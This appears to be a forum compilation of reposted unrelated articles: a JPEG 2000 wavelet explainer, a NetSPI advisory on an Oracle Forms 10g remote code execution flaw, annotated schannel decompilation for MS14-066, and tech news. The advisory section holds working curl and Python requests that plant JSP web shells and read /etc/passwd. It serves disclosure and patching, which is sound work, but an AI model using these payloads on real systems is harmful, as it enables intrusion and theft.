In addition, the JPEG algorithm allows us to recover the image at only one resolution. In some instances, it is desirable to also recover the image at lower resolutions, allowing, for instance, the image to be displayed at progressively higher resolutions while the full image is being downloaded.

To address these demands, among others, the JPEG 2000 standard was introduced in December 2000. While there are several differences between the two algorithms, we'll concentrate on the fact that JPEG 2000 uses a wavelet transform in place of the DCT.

Before we explain the wavelet transform used in JPEG 2000, we'll consider a simpler example of a wavelet transform. As before, we'll imagine that we are working with luminance-chrominance values for each pixel. The DCT worked by applying the transform to one row at a time, then transforming the columns. The wavelet transform will work in a similar way.

To this end, we imagine that we have a sequence f0, f1, ..., fn describing the values of one of the three components in a row of pixels. As before, we wish to separate rapid changes in the sequence from slower changes. To this end, we create a sequence of wavelet coefficients:

a2i = (f2i + f2i+1) / 2
a2i+1 = f2i − f2i+1

Notice that the even coefficients record the average of two successive values--we call this the low pass band, since information about high frequency changes is lost--while the odd coefficients record the difference of two successive values--we call this the high pass band, as high frequency information is passed on. The number of low pass coefficients is half the number of values in the original sequence (as is the number of high pass coefficients). It is important to note that we may recover the original f values from the wavelet coefficients, as we'll need to do when reconstructing the image:

f2i = a2i + a2i+1 / 2
f2i+1 = a2i − a2i+1 / 2

We reorder the wavelet coefficients by listing the low pass coefficients first, followed by the high pass coefficients. Just as with the 2-dimensional DCT, we may now apply the same operation to transform the wavelet coefficients vertically. This results in a 2-dimensional grid of wavelet coefficients divided into four blocks by the low and high pass bands.

(Figure: the four bands LL, HL, LH, and HH.)

As before, we use the fact that the human eye is less sensitive to rapid variations to deemphasize the rapid changes seen with the high pass coefficients, through a quantization process analogous to that seen in the JPEG algorithm. Notice that the LL region is obtained by averaging the values in a 2 by 2 block and so represents a lower resolution version of the image.

In practice, our image is broken into tiles, usually of size 64 by 64. The reason for choosing a power of 2 will be apparent soon. We'll demonstrate using our image with the tile indicated. (This tile is 128 by 128 so that it may be more easily seen on this page.) Notice that, if we transmit the coefficients in the LL region first, we could reconstruct the image at a lower resolution before all the coefficients had arrived, one of the aims of the JPEG 2000 algorithm. We may now perform the same operation on the lower resolution image in the LL region, thereby obtaining images of lower and lower resolution.

The wavelet coefficients may be computed through a lifting process, for instance

a2i = (f2i + f2i+1) / 2,  then  a2i+1 = 2 (a2i − f2i+1)

The advantage is that the coefficients may be computed without using additional computer memory--a0 first replaces f0, and then a1 replaces f1. Also, in the wavelet transforms that are used in the JPEG 2000 algorithm, the lifting process enables faster computation of the coefficients.

The JPEG 2000 wavelet transform

The wavelet transform described above, though similar in spirit, is simpler than the ones proposed in the JPEG 2000 standard. For instance, it is desirable to average over more than two successive values to obtain greater continuity in the reconstructed image and thus avoid phenomena like blocking artifacts. One of the wavelet transforms used is the Le Gall (5,3) spline, in which the high pass (odd) and low pass (even) coefficients are computed by

a2i+1 = f2i+1 − (f2i + f2i+2) / 2
a2i = f2i + (a2i−1 + a2i+1) / 4

As before, this transform is invertible, and there is a lifting scheme for performing it efficiently. Another wavelet transform included in the standard is the Cohen-Daubechies-Feauveau 9/7 biorthogonal transform, whose details are a little more complicated to describe, though a simple lifting recipe exists to implement it.
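A Python sketch of the simple averaging/differencing transform and its inverse (one level, applied to one row of even length; the Le Gall (5,3) and 9/7 transforms replace the two-point average and difference with the longer filters just described):

def wavelet_1d(f):
    # Low pass: pairwise averages; high pass: pairwise differences.
    low  = [(f[2 * i] + f[2 * i + 1]) / 2.0 for i in range(len(f) // 2)]
    high = [f[2 * i] - f[2 * i + 1] for i in range(len(f) // 2)]
    return low + high                 # low pass band listed first

def wavelet_1d_inverse(a):
    n = len(a) // 2
    low, high = a[:n], a[n:]
    f = []
    for i in range(n):
        f.append(low[i] + high[i] / 2.0)   # recovers f at even positions
        f.append(low[i] - high[i] / 2.0)   # recovers f at odd positions
    return f

Applying wavelet_1d to every row and then to every column of a tile produces the four bands described above, and repeating it on the LL block yields the successively lower resolutions.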
It is worthwhile to compare JPEG and JPEG 2000. Generally speaking, the two algorithms have similar compression ratios, though JPEG 2000 requires more computational effort to reconstruct the image. JPEG 2000 images do not show the blocking artifacts present in JPEG images at high compression ratios, but rather become more blurred with increased compression; JPEG 2000 images are often judged by humans to be of a higher quality. At this time, JPEG 2000 is not widely supported by web browsers, but it is used in digital cameras and medical imagery. There is also a related standard, Motion JPEG 2000, used in the digital film industry.

David Austin
Grand Valley State University
david at merganser.math.gvsu.edu

Sursa: Feature Column from the AMS
4. Advisory: Oracle Forms 10g Unauthenticated Remote Code Execution (CVE-2014-4278)

Khai Tran | October 14, 2014

Vulnerability Description:
Oracle Forms 10g contains code that does not properly validate user input. This could allow an unauthenticated user to execute arbitrary commands on the remote Oracle Forms server. Also affected: Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3 and 12.2.4 [1]

Vulnerability Details:
When a user launches a new Oracle Forms application, the application first invokes the FormsServlet class to initiate the connection. The application then invokes the ListenerServlet class, which launches a frmweb process in the background on the remote server. The normal URL to invoke ListenerServlet looks like:

http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1

With the above URL, the normal frmweb process is started with the following parameters:

frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1

where the ifip parameter is controllable by user input. The frmweb executable, however, accepts one more parameter:

frmweb server webfile=HTTP-0,0,0,em_mode,127.0.0.1,logfile

A log file, named based on the user-supplied log name, is created on the server following the request. The content of the log file contains the log file name:

FORMS CONNECTION ACTIVITY LOG FILE
Developer:Forms/LogRecord
[Fri May 9 16:46:58 2014 EDT]::Server Start-up Data:
Server Log Filename: logfile
Server Hostname: oralin6u5x86
Server Port: 0
Server Pool: 1
Server Process Id: 15638

The Oracle Forms application does not perform adequate input validation on the logfile parameter and allows directory traversal sequences (../). By controlling the ifip parameter passed to the ListenerServlet class, an attacker can now control the logfile location and, partially, its content as well. Combined with the weak configuration of the remote web server, which allows jsp files to be served under the http://host:port/forms/java location, an attacker could upload a remote shell and execute arbitrary code on the server.

Technical challenges: The web server does not seem to accept white spaces or new lines; it also limits the number of characters that can be passed on to the frmweb executable. To execute operating system commands, a custom JSP shell was developed that bypasses such restrictions.

Verification:
Proof-of-concept exploit (tested with Oracle Development Suite 10.1.2.0.2, installed on Oracle Linux 5u6). Upload the first shell to execute commands (see Other Notes for the decoded version):

curl --request GET 'http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1,./java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp'

After the first step, the attacker can execute OS commands via the blind shell, located at: http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp.
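The same first-stage request can be expressed as a short Python sketch (my own illustration; only the URL itself comes from the advisory). http.client is used instead of a higher-level HTTP library so the pre-encoded payload goes out byte-for-byte, the way curl sends it:

import http.client

# Stage 1: smuggle a traversal string through the ifip parameter so frmweb
# treats it as the log-file path and drops a .jsp file under /forms/java/.
jsp = ('<%25java.lang.Runtime.getRuntime().exec('
       'request.getParameterValues("cmd"))%3b%25>.jsp')
path = ("/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5"
        "&ifcmd=getinfo&ifip=127.0.0.1,./java/" + jsp)

conn = http.client.HTTPConnection("127.0.0.1", 8889)
conn.request("GET", path)          # the path is passed through without re-encoding
print(conn.getresponse().status)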
To retrieve the command results, the attacker can use the first blind shell to write a second JSP shell, based on fuzzdb's cmd.jsp [3]:

curl --request GET 'http://127.0.0.1:8889/forms/java/<%25java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"))%3b%25>.jsp?cmd=/bin/sh&cmd=-c&cmd=echo%20PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIlPjwlU3RyaW5nIG9wPSIiLHM9IiI7dHJ5e1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7QnVmZmVyZWRSZWFkZXIgc0k9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihwLmdldElu-cHV0U3RyZWFtKCkpKTt3aGlsZSgocz1zSS5yZWFkTGluZSgpKSE9bnVsbCl7b3ArPXM7fX1jYXRjaChJT0V4Y2VwdGlvbiBlKXtlLnByaW50U3RhY2tUcmFjZSgpO30lPjwlPW9wJT4%3d|base64%20--decode%3E./forms/java/cmd.jsp'

The second shell is now available at http://127.0.0.1:8889/forms/java/cmd.jsp. To get the content of /etc/passwd on the remote server:

curl --request GET 'http://127.0.0.1:8889/forms/java/cmd.jsp?cmd=cat+/etc/passwd'
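In the same hedged spirit, driving the second-stage shell from Python (the URL and the cmd parameter are the advisory's; the code is my illustration):

import http.client
from urllib.parse import quote

# Run a command through the uploaded cmd.jsp and print its output.
cmd = quote("cat /etc/passwd")     # encodes the space, as curl's '+' did
conn = http.client.HTTPConnection("127.0.0.1", 8889)
conn.request("GET", "/forms/java/cmd.jsp?cmd=" + cmd)
print(conn.getresponse().read().decode(errors="replace"))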
Recommendations for Oracle:
Create a white list of characters that are allowed to appear in the input and accept input composed exclusively of characters in the approved set. Consider removing support for jsp files on the remote web server if it is not required.

Other notes:
URL-decoded version of the first blind JSP shell:

<%java.lang.Runtime.getRuntime().exec(request.getParameterValues("cmd"));%>

Base64-decoded version of the second JSP shell:

<%@page import="java.io.*"%><%String op="",s="";try{Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s=sI.readLine())!=null){op+=s;}}catch(IOException e){e.printStackTrace();}%><%=op%>

Oracle Forms 10g is also vulnerable to a simple DoS attack: each time the URL http://127.0.0.1:8889/forms/lservlet?ifcfs=/forms/frmservlet?acceptLanguage=en-US,en;q=0.5&ifcmd=getinfo&ifip=127.0.0.1 is invoked, a frmweb process is launched in the background. An attacker could exhaust server resources simply by requesting the same URL multiple times. I believe this behavior is fixed in version 11g and onwards with connection pooling.

For Oracle Forms 11g and onwards, it is still possible to inject into the command arguments of the frmweb executable through a different vector. However, the frmweb executable does not seem to recognize that last argument as the log file location; therefore another vulnerability may be required in order to gain code execution.

Since Oracle has ended its support for Forms 10g [2], a patch for Forms 10g itself was not released in the October 2014 CPU [1]. However, the Forms 10g component is still being used in E-Business Suite, so a patch for it was released [1]. If your organization is still using Oracle Forms 10g, I would recommend backporting the fix from E-Business Suite, or upgrading to Forms version 11 or newer.

Report Timeline:
May 15, 2014: vulnerability reported to Oracle.
June 18, 2014: vulnerability confirmed by Oracle.
October 14, 2014: patch released.

References:
[1] Oracle Critical Patch Update - October 2014
[2] https://blogs.oracle.com/grantronald/entry/alert_for_forms_customers_running_oracle_forms_10g
[3] https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

Sursa: https://blog.netspi.com/advisory-oracle-forms-10g-unauthenticated-remote-code-execution-cve-2014-4278/
5. MS14-066 schannel.dll SPVerifySignature (Windows 2003 SP2)

/*
Summarizing the most likely conditions where these bugs occur:

Code Execution: heap smash via qmemcpy() if CryptDecodeObject() returns more than 40 bytes in pcbStructInfo.

Verification Bypass: a failed decode results in a positive return value. This is not STATUS_SUCCESS, but a caller that is checking <0 vs == 0 would think verification succeeded on a bad decode.
*/

//----- (7676F6D4) --------------------------------------------------------
int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8)
{
  signed int v8;            // esi@4
  BOOL v9;                  // eax@8
  DWORD v10;                // eax@14
  DWORD pcbStructInfo;      // [sp+Ch] [bp-3Ch]@11
  HCRYPTKEY phKey;          // [sp+10h] [bp-38h]@1
  HCRYPTHASH phHash;        // [sp+14h] [bp-34h]@1
  BYTE *pbSignature;        // [sp+18h] [bp-30h]@1
  char pvStructInfo[40];    // [sp+1Ch] [bp-2Ch]@11

  phKey = 0;
  phHash = 0;
  pbSignature = 0;
  if ( hProv && a2 )
  {
    // Allocate cbEncoded bytes on the heap for the signature
    pbSignature = (BYTE *)SPExternalAlloc(cbEncoded);
    if ( !pbSignature )
    {
      // Exit early if the allocation failed
      v8 = -2146893056;
      goto LABEL_18;
    }
    // Import the key and create the hash, bailing out if it fails
    if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey)
      || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) )
      goto LABEL_12;
    // Verify that CryptHashData or CryptSetHashParam succeeds (but how is a8 being set?)
    v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0);
    if ( !v9 )
      goto LABEL_12;
    if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 )
    {
      // Indicate that we have 40 bytes to decode the signature value
      pcbStructInfo = 40;
      // CryptDecodeObject() states that pvStructInfo can be larger than pcbStructInfo
      // Bail out if the decode fails
      /*
      BOOL WINAPI CryptDecodeObject(
        _In_    DWORD  dwCertEncodingType, (X509_ASN_ENCODING)
        _In_    LPCSTR lpszStructType,     (X509_DSS_SIGNATURE)
        _In_    const BYTE *pbEncoded,     (Caller)
        _In_    DWORD  cbEncoded,          (Caller)
        _In_    DWORD  dwFlags,            (0)
        _Out_   void   *pvStructInfo,      (40 byte stack variable)
        _Inout_ DWORD  *pcbStructInfo      (in:40, out:arbitrary)
      );

      pcbStructInfo [in, out]: A pointer to a DWORD value specifying the size, in bytes,
      of the buffer pointed to by the pvStructInfo parameter. When the function returns,
      this DWORD value contains the size of the decoded data copied to pvStructInfo.
      The size contained in the variable pointed to by pcbStructInfo can indicate a size
      larger than the decoded structure, as the decoded structure can include pointers
      to other structures. This size is the sum of the size needed by the decoded
      structure and other structures pointed to.
      */
      if ( !CryptDecodeObject(X509_ASN_ENCODING, X509_DSS_SIGNATURE, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) )
      {
LABEL_12:
        // This might be the signature bypass vector if the caller incorrectly checks <0 vs STATUS_SUCCESS
        GetLastError();
        v8 = 3;
        goto LABEL_18;
      }
      v10 = pcbStructInfo;
      // This is likely our RCE vector, if pcbStructInfo > cbEncoded
      qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo);
      // Changes cbEncoded to the (possibly bad) returned value of pcbStructInfo
      cbEncoded = v10;
    }
    else
    {
      ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded);
    }
    v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391;
  }
  else
  {
    v8 = -1;
  }
LABEL_18:
  if ( phKey )
    CryptDestroyKey(phKey);
  if ( phHash )
    CryptDestroyHash(phHash);
  if ( pbSignature )
    SPExternalFree(pbSignature);
  return v8;
}
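A quick way to see why the comment at LABEL_12 matters: the function returns 3 on a failed decode, so only a caller that compares against exactly zero treats that as a failure. A small Python model of the mismatched caller contract (purely illustrative, not Windows code):

SEC_E_OK = 0
DECODE_FAILED = 3          # the positive status set at LABEL_12 above

def careless_caller_accepts(status):
    # WRONG: interprets "not negative" as success, so the failed
    # decode status of 3 is treated as a verified signature.
    return not (status < 0)

def careful_caller_accepts(status):
    # RIGHT: success is exactly STATUS_SUCCESS.
    return status == SEC_E_OK

assert careless_caller_accepts(DECODE_FAILED)        # bypass
assert not careful_caller_accepts(DECODE_FAILED)     # correctly rejected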
Sursa: https://gist.github.com/hmoore-r7/3379af8b0419ddb0c76b

6. OpenSUSE 13.2

OpenSUSE 13.2 supercharged with smoother setup, system snapshots, Btrfs, and more
Chris Hoffman @chrisbhoffman

OpenSUSE 13.2 was released a week ago. As with the recent Fedora update, the latest release of openSUSE took a year to develop instead of the standard six months, as the organization retooled its development practices. SUSE Linux has now been around for over 20 years, and it's still going strong. As usual, the latest release serves as a foundation for developing Novell's SUSE Linux Enterprise and brings some significant new improvements. So let's dive right in!

A streamlined installer

OpenSUSE provides live media, and that live media can now be persistent. This means you could set up a live openSUSE 13.2 USB stick and have your files and settings saved on it between uses. But openSUSE still recommends using an old-fashioned 4.7 GB DVD installer disc for actually installing the operating system on your computer.

The installer lets you choose your preferred desktop: GNOME, KDE, or another one. GNOME and KDE are on fairly equal footing in openSUSE these days, but the openSUSE community has always loved KDE. KDE 4.14 is the default, although GNOME users will also be right at home.

The openSUSE installer has seen a lot of much-needed polish and streamlining. Previously, the installer had a "phase 2": first it installed on your system, and then you'd reboot into your new system and be forced to go through an additional setup process. Now the installer does everything during the standard installation process, and there is no phase 2. The installer also has a "brand new look and feel focused on usability" and removes configuration screens like LDAP user authentication and printer setup. You can adjust these settings after you install the system, if you need to.

Btrfs and file system snapshots

OpenSUSE uses the new Btrfs file system by default. If you prefer another Linux distribution, it will probably start using Btrfs soon, too. It's clear that this is the future file system that will replace ext4, so the only question is when it's stable enough for Linux distributions to flip the switch. OpenSUSE has decided the time is now.

Btrfs is sometimes pronounced "better FS," and that's what it is. It's faster, more robust, and more modern. One of its most interesting features is the ability to create file system snapshots. OpenSUSE uses this to great effect, providing a boot menu option that allows you to boot straight into those previous snapshots via the "Snapper" tool. This is great for recovering from system problems, as it allows you to boot straight into an older file system state before corruption and other problems occurred. The snapshot feature is also available in the just-released SUSE Linux Enterprise Server 12. This is an enterprise-grade feature, not just a new-and-unstable toy.

Yet another faster setup tool

The YaST configuration tool--literally an abbreviation for "Yet another Setup Tool"--is used for system configuration. This has always been one of SUSE's most distinctive features. In the past, it's sometimes been overly slow and clunky, but it also provides a one-stop graphical configuration interface for practically everything you'd want to do when configuring a Linux system, from modifying your bootloader's menu to configuring various different types of servers.
OpenSUSE 13.2's YaST on the KDE desktop environment.

In openSUSE 13.1, YaST was rewritten in the Ruby programming language. They've now had time to polish that work further: YaST is now faster, more stable, and better integrated with Btrfs, systemd, and other modern technologies.

The usual upgrades

As usual with Linux distribution updates, many, if not most, of the changes you'll see are just the result of upgrading to the latest versions of the various upstream software packages. This means Linux kernel 3.16, KDE 4.14, and GNOME 3.14. OpenSUSE's repositories now include the MATE desktop, too--good news for GNOME 2 diehards! A preview of KDE's new Plasma 5.1 desktop is also available. For more details about all the various changes, check out the official list of major features.

Sursa: OpenSUSE 13.2 Linux adds smoother setup, system snapshots, Btrfs, more
7. We're taking to the streets, I like the protests
  8. Microsoft's silent, secret security updates Summary: Does Microsoft find and fix security problems in their own products? You might assume so, but the company gives no reason to believe it. I assume they do, but silently. By Larry Seltzer for Zero Day | November 12, 2014 -- 13:00 GMT (05:00 PST) It's an odd and conspicuous feature of Microsoft's security bulletins that they never report vulnerabilities found internally at Microsoft. All of the credits go to outsiders. For example, yesterday's Patch Tuesday updates fixed 32 identified vulnerabilities, none of which were credited to Microsoft. These companies, bug bounty programs and individuals were credited: Baidu Security Team (X-Team) Context Information Security EY Esage Lab Google Project Zero Google Security Team HP's Zero Day Initiative IBM X-Force Kaspersky Lab KoreLogic Security McAfee Security Team Palo Alto Networks Qihoo 360 Secunia Research Two unaffiliated individuals: Takeshi Terada, Daniel Trebbien I eyeballed every disclosure released this year and saw no vulnerabilities credited to Microsoft. I've been following this for many years and can say that it's always been thus. There are some vaguer cases. The blockbuster Schannel vulnerability in MS14-066 is stated to be "privately-reported" but no credit is given; this happens now and then, perhaps ten times this year. Sometimes the credited party is named with no organizational affiliation, as with the two individuals in the list above, but I've checked a bunch of these and none of them are Microsoft people. Sometimes the credited party is anonymous, but always reported as an outsider reporting to Microsoft. (As an aside, with this month Microsoft has started putting all the credits in a single acknowledgements page rather than spreading them around the individual security bulletins.) Does Microsoft actually never find vulnerabilities in their own products? This is hard to believe. Both Google and Apple regularly give credit to internal researchers. If Microsoft does find vulnerabilities, what's happening to them? Does Microsoft just not fix them? Do they pass them on to friends who get bug bounties from HP's ZDI (Zero Day Initiative)? Or maybe Microsoft or their employees go directly to ZDI. Consider these two credits from the August Cumulative Security Update for Internet Explorer: An anonymous researcher, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4052) Sky, working with HP's Zero Day Initiative, for reporting the Internet Explorer Memory Corruption Vulnerability (CVE-2014-4058) Who's to say these aren't Microsoft employees? But I think it's more likely Microsoft is hiding security updates inside other updates, such as non-security updates. Consider the episode a few months ago when Microsoft had to pull a number of updates after they borked users' systems. One of those updates was an "Update to support the new currency symbol for the Russian ruble in Windows." This is one of the updates that caused systems to go into infinite reboot loops. Just for adding a new Ruble symbol to the system you get that kind of catastrophic failure? Perhaps there was more to it. Alternatively, Microsoft could be hiding security updates inside of other security updates. There have been ten Cumulative Updates for Internet Explorer so far this year. It would be easy to hide another patch in one of those. 
In the September Cumulative Update Microsoft said "In addition to the changes that are listed for the vulnerabilities described in this bulletin, this update includes defense-in-depth updates to the Internet Explorer XSS Filter to help improve security-related features." The same text is in the June Cumulative Update. That's some pretty elastic description there and Cumulative updates, by definition, are large and complicated. The main argument for why I'm wrong is that it would be possible for outsiders to reverse-engineer the differences between versions, as they are said to do in order to find the vulnerable code and write exploits for it, and they would then write exploits for the silently-patched vulnerabilities. But perhaps this actually happens all the time. (That's what I see as the main argument; please tell me why you think I'm wrong in the comments below.) Of course I don't actually know that Microsoft is hiding secret security updates, but the alternatives aren't exactly flattering. It's especially odd to think that Microsoft doesn't hunt for security bugs in their own products when they do so in other companies'. Just yesterday, one of the many vulnerabilities fixed by Adobe in Flash Player (CVE-2014-8442) was reported by "Behrang Fouladi and Axel Souchet of Microsoft Vulnerability Research." Over the last ten years or so Microsoft has gone to great lengths to gain credibility in security and I think they are generally respected in this regard. Why would they not acknowledge any internally-discovered vulnerabilities? Sounds incredible to me. Microsoft declined to comment. Sursa: Microsoft's silent, secret security updates | ZDNet
9. Adobe fixes 18 vulnerabilities in Flash Player

By Lucian Constantin
IDG News Service | Nov 12, 2014 5:20 AM PT

Adobe Systems released critical security updates Tuesday for Flash Player to address 18 vulnerabilities, many of which can be remotely exploited to compromise underlying systems. Fifteen of the patched vulnerabilities can result in arbitrary code execution, one can be exploited to disclose session tokens, and two allow attackers to escalate their privileges from the low to medium integrity level, Adobe said in a security advisory.

The company advises Windows and Mac users to update to the newly released Flash Player version 15.0.0.223. Linux users should update to Flash Player 11.2.202.418. The Flash Player Extended Support Release, which is based on Flash Player 13, was also updated, to version 13.0.0.252. The Flash Player plug-ins bundled with Google Chrome and Internet Explorer on Windows 8 and 8.1 will be upgraded automatically through those browsers' update mechanisms.

Adobe also released new versions of Adobe AIR, the company's runtime and software development kit (SDK) for rich Internet applications, because it bundles Flash Player. Users of the AIR desktop and Android runtime, as well as users of the AIR SDK and AIR SDK & Compiler, should update to version 15.0.0.356.

Many of the vulnerabilities patched in these new Flash Player releases were found and reported by researchers from Google, Microsoft, McAfee and Trend Micro. Adobe said via email that it is not aware of exploits for these vulnerabilities being used in the wild. However, as demonstrated last month, cybercriminals don't waste a lot of time before they start to attack newly patched Flash Player flaws.

Lucian Constantin, Romania Correspondent
Lucian Constantin writes about information security, privacy, and data protection for the IDG News Service.

Sursa: Adobe fixes 18 vulnerabilities in Flash Player | CSO Online
10. Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration

Creator: Xeno Kovah @XenoKovah
License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code.
Lab Requirements: Requires a 64 bit Windows 7 system with Visual C++ 2012 Express Edition. Requires a 64 bit Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual.
Class Textbook: "Introduction to 64 Bit Assembly Programming for Linux and OS X: Third Edition" by Ray Seyfarth
Recommended Class Duration: 2 days
Creator Available to Teach In-Person Classes: Yes

Author Comments:
Intel processors have been a major force in personal computing for more than 30 years. An understanding of the low level computing mechanisms used in Intel chips, as taught in this course, serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of the time will be spent learning Linux tools for analysis.

This class serves as a foundation for the follow-on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown that it is possible to read most programs by knowing only around 20-30 instructions and their variations.

The instructor-led lab work will include:
* Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov)
* Stepping through a slightly more complicated program (adds lea (load effective address), add, sub)
* Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in asm)
* Understanding conditional control flow and how loops are translated from C to asm (conditional jumps, jge (jump greater than or equal), jle (jump less than or equal), ja (jump above), cmp (compare), test, etc.)
* Boolean logic (and, or, xor, not)
* Logical and arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar (arithmetic shift right))
* Signed and unsigned multiplication and division
* Special one-instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep movs (repeat move))
* Misc instructions like leave and nop (no operation)
* Running examples in the Visual Studio debugger on Windows and the GNU Debugger (GDB) on Linux
* The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb, giving the correct input to avoid it "blowing up". This will be an independent activity.

Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering.
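As a small taste of the shift material in the labs above, here is a Python illustration (my own, not course material) of the logical vs. arithmetic shift-right distinction that SHR and SAR implement:

MASK32 = 0xFFFFFFFF

def shr32(x, n):
    """x86 SHR: logical shift right, vacated high bits filled with zeros."""
    return (x & MASK32) >> n

def sar32(x, n):
    """x86 SAR: arithmetic shift right, the sign bit is replicated."""
    x &= MASK32
    if x & 0x80000000:                       # negative in two's complement
        return ((x >> n) | (MASK32 << (32 - n))) & MASK32
    return x >> n

minus8 = -8 & MASK32                          # 0xFFFFFFF8, two's complement
assert shr32(minus8, 1) == 0x7FFFFFFC         # logical: a huge positive value
assert sar32(minus8, 1) == (-4 & MASK32)      # arithmetic: -8 >> 1 is still -4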
To submit any suggestions, corrections, or explanations of things I didn't know the reasons for, please email me at the address above.

Author Biography:
Xeno has a BS in CS from UMN, and an MS in security from CMU, which he attended through the National Science Foundation Scholarship for Service (aka CyberCorps) program. He has been attending security conferences since 1999, working full time on security research since 2007, and presenting at conferences since 2012. He is a little bit broke in the brain in that way that makes him feel the need to collect things. Most recently he has been collecting conference speaking credits. He has presented at BlackHat USA/EUR, IEEE S&P, ACM CCS, Defcon, CanSecWest, PacSec, Hack in the Box KUL, Microsoft BlueHat, Shmoocon, Hack.lu, NoSuchCon, SummerCon, ToorCon, DeepSec, VirusBulletin, MIRCon, AusCERT, Trusted Infrastructure Workshop, NIST NICE Workshop, DOD Information Assurance Symposium, and MTEM. His joint work has also been presented by his colleagues at Syscan, EkoParty, Hack in the Box AMS, Hack in Paris, Sec-T, SecTor, Source Boston, and Breakpoint/Ruxcon. Gotta collect 'em all! (he says, as someone who is *not* of the Pokemon generation, but understands that particular form of psychological manipulation)

Class Materials:
All Materials (.zip of .pptx (302 slides), pdf (manuals), Visual Studio (code) files)
All Materials (.zip of .key (302 slides), pdf (manuals), Visual Studio (code) files)
All Materials (.zip of .pdf (302 slides), pdf (manuals), Visual Studio (code) files)
Introduction (26 slides)
Refreshers (5 slides)
Architecture (19 slides)
The Stack (22 slides)
Example 1 (43 slides)
Local variables (15 slides)
Function parameter passing (14 slides)
Control flow (15 slides)
Boolean logic (9 slides)
Shifts (11 slides)
Multiply & divide (5 slides)
Rep Stos (9 slides)
Rep Movs (8 slides)
Assembly syntax (Intel vs. AT&T syntax) (4 slides)
Linux tools (21 slides)
Inline assembly & raw byte emitting (10 slides)
Read The Fun Manual! (20 slides)
Variable length assembly instructions (3 slides)
Effects of compiler options (4 slides)
Bomb lab (6 slides)
Messing with disassemblers (7 slides)
Two's complement (6 slides)
Basic buffer overflow lab (12 slides)
Conclusion (8 slides)
Visual Studio Express 2012 code for labs
64 bit compiled copy of CMU Linux bomb lab ELF executable (originally from here)

Sursa: http://opensecuritytraining.info/IntroX86-64.html
11. IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows
By Robert Freeman • November 11, 2014

The IBM X-Force Research team has identified a significant data manipulation vulnerability (CVE-2014-6332) with a CVSS score of 9.3 in every version of Microsoft Windows from Windows 95 onward. We reported this issue with a working proof-of-concept exploit back in May 2014, and today, Microsoft is patching it. It has been remotely exploitable since Microsoft Internet Explorer (IE) 3.0. This complex vulnerability is a rare, "unicorn-like" bug found in code that IE relies on but doesn't necessarily belong to. The bug can be used by an attacker for drive-by attacks to reliably run code remotely and take over the user's machine, even sidestepping the Enhanced Protected Mode (EPM) sandbox in IE 11 as well as the highly regarded Enhanced Mitigation Experience Toolkit (EMET) anti-exploitation tool Microsoft offers for free.

What Does This Mean?

First, this means that significant vulnerabilities can go undetected for some time. In this case, the buggy code is at least 19 years old and has been remotely exploitable for the past 18 years. Looking at the original release code of Windows 95, the problem is present. With the release of IE 3.0, remote exploitation became possible because it introduced Visual Basic Script (VBScript). Other applications over the years may have used the buggy code, though the inclusion of VBScript in IE 3.0 makes it the most likely candidate for an attacker. In some respects, this vulnerability has been sitting in plain sight for a long time, despite many other bugs being discovered and patched in the same Windows library (OleAut32).

